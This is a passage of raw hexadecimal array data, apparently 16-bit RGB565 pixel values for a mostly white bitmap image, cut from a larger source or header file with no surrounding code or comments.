0xffdf, 0xdedc, 0xbdd8, 0xdefb, 0x8430, 0xffde, 0x8c71, 0xf79e, 0x7bcf, 0x8c72, 0xad55, 0xbdd7, 0xd69a, 0x8c71, 0xffff, 0xd6ba, 0x7bcf, 0xffff, 0xad55, 0xf7be, 0xd6ba, 0xa534, 0xffff, 0xf79e, 0x94b2, 0xd69a, 0xdedb, 0xb596, 0xad75, 0xffff, 0xbdf7, 0xad75, 0xbdd7, 0xc618, 0x9471, 0xffff, 0xbdf7, 0xef7d, 0xb5b6, 0xa555, 0xc659, 0xadb6, 0xd6db, 0x7bf0, 0xf7bf, 0xc639, 0xd6db, 0xd6bb, 0x94d3, 0xef7e, 0xf7ff, 0x8c92, 0xe75d, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xf7ff, 0xffff, 0xb5b5, 0xc617, 0x8c4f, 0x9cf2, 0x9cd2, 0x94b3, 0x9cd3, 0xdedb, 0xbdd7, 0x9cd3, 0xa534, 0xc658, 0xb5d7, 0x7c30, 0xd6db, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe73c, 0xb5b5, 0xce78, 0xad75, 0x8c91, 0x9cd2, 0xa534, 0xd6ba, 0xb555, 0xbdb7, 0x9492, 0xbdf7, 0xc618, 0x9cb3, 0xa4f4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xd6da, 0xce78, 0xffff, 0xbdd7, 0xdeda, 0xffff, 0xd6ba, 0xe75c, 0x7bee, 0xc658, 0xffff, 0xffff, 0x8c50, 0x9cb2, 0x9cd2, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xdeba, 0xb595, 0xef5c, 0xad75, 0xd6ba, 0xce99, 0xbe17, 0xd6ba, 0xffff, 0xffff, 0x8451, 0xf7df, 0xce59, 0x738d, 0xbdd6, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xbdb6, 0xe73c, 0xa534, 0xe71b, 0x840f, 0xd699, 0xffff, 0xffff, 0xe73b, 0x94b2, 0xbdd6, 0xffff, 0xbdf6, 0xad54, 0xce79, 0xdedb, 0xffff, 0xffff, 0xdedb, 0x94b2, 0xb596, 0xffff, 0xdedb, 0x9492, 0xbdf7, 0xbdd7, 0xa514, 0xb596, 0xffff, 0xb5b6, 0xef7d, 0x9492, 0xdeda, 0xad95, 0x9cf3, 0x9d13, 0xf7be, 0xa535, 0xce79, 0x94b3, 0x9d14, 0xffff, 0xdefc, 0xd6db, 0xffff, 0xffff, 0xffff, 0x9cf3, 0x9cf3, 0x8c51, 0xbdf7, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xefff, 0xf7ff, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffde, 0xffff, 0xffff, 0xf79e, 0xffff, 0xf79d, 0xffff, 0xffff, 0xf7ff, 0xe79e, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xfffe, 0xf77c, 0xffde, 0xffff, 0xffff, 0xffbe, 0xffbe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf79e, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffbe, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffde, 0xf7be, 0xffff, 0xffff, 0xf7be, 0xffff, 0xffdf, 0xffff, 0xffde, 0xffff, 0xffff, 0xffde, 0xffff, 0xf7df, 0xf7bf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7fe, 0xfffe, 0xfffe, 0xffff, 0xf7de, 0xffff, 0xffff, 0xffff, 0xffff, 0xef7d, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xf79e, 0xffff, 0xffdf, 0xffff, 0xf7be, 0xffdf, 0xf79e, 0xffdf, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xef9d, 0xffff, 0xffff, 0xf7be, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf77e, 0xffdf, 0xffbf, 0xffff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffbe, 0xffff, 0xffff, 0xf79e, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7de, 0xffff, 0xffde, 0xfffe, 0xffff, 0xffff, 0xffff, 0xf7de, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xff9e, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7df, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7fe, 0xffdd, 0xfffe, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffbf, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7be, 0xffff, 0xffde, 0xffdf, 0xffde, 0xffff, 0xf7ff, 0xf7ff, 0xf7df, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7fe, 0xf7ff, 0xf7ff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xf7df, 0xffff, 0xffff, 0xffdf, 0xf79f, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xf7df, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffbe, 0xffde, 0xffff, 0xffff, 0xffde, 0xffbe, 0xffdf, 0xffbf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffde, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffdf, 0xf7bf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffbf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xf7be, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7bf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xf7be, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xf7be, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xf7bf, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffde, 0xffdf, 0xf7be, 0xffff, 0xffbe, 0xffff, 0xf7be, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xffdf, 0xffbf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffdf, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffdf, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffbf, 0xffdf, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xf7ff, 0xf7bf, 0xffff, 0xffbf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffde, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xf7bf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffbe, 0xffff, 0xffde, 0xffff, 0xffde, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffbf, 0xffdf, 0xffbf, 0xffbf, 0xffdf, 0xffbf, 0xffff, 0xffff, 0xffde, 0xffde, 0xffff, 0xfffe, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffbf, 0xffff, 0xffdf, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7df, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7df, 0xf7ff, 0xf7ff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xefdf, 0xf7ff, 0xffff, 0xfffe, 0xffde, 0xffff, 0xffff, 0xf7fe, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7df, 0xffdf, 0xffbf, 0xffff, 0xffdf, 0xfffe, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xf7ff, 0xf7ff, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffde, 0xffdd, 0xfffe, 0xffde, 0xffff, 0xffdf, 0xfffd, 0xfffe, 0xf7ff, 0xfffe, 0xfffe, 0xffbd, 0xffde, 0xffbf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xfffe, 0xffbe, 0xffdf, 0xf7ff, 0xefff, 0xf7ff, 0xfffe, 0xffbe, 0xfffe, 0xfffe, 0xf7fe, 0xfffe, 0xffff, 0xffff, 0xefff, 0xf7df, 0xf7ff, 0xf7ff, 0xf7ff, 0xefff, 0xe7ff, 0xe7ff, 0xefff, 0xf7ff, 0xffff, 0xffdf, 0xffff, 0xfffe, 0xfffd, 0xfffe, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffbf, 0xffdf, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xfffd, 0xfffe, 0xf7ff, 0xefff, 0xf7ff, 0xffff, 0xfffe, 0xffdd, 0xffdd, 0xfffe, 0xffde, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xf7ff, 0xf7df, 0xffde, 0xfffd, 0xfffd, 0xffdd, 0xffde, 0xffbe, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffbe, 0xffde, 0xffdd, 0xffdd, 0xffdd, 0xffbd, 0xffdd, 0xfffe, 0xffdd, 0xffbd, 0xfffe, 0xffdd, 0xffff, 0xffff, 0xf7df, 0xffff, 0xffff, 0xffdf, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffbd, 0xffdd, 0xffdd, 0xfffe, 0xf7ff, 0xe7ff, 0xffff, 0xffbf, 0xffbe, 0xfffd, 0xffdd, 0xfffe, 0xffff, 0xf7ff, 0xefff, 0xefff, 0xe7ff, 0xe7ff, 0xefff, 0xf7ff, 0xfffd, 0xfffc, 0xf7fd, 0xfffd, 0xfffd, 0xfffe, 0xf7ff, 0xf7ff, 0xffbe, 0xffdf, 0xffff, 0xf7ff, 0xf7ff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 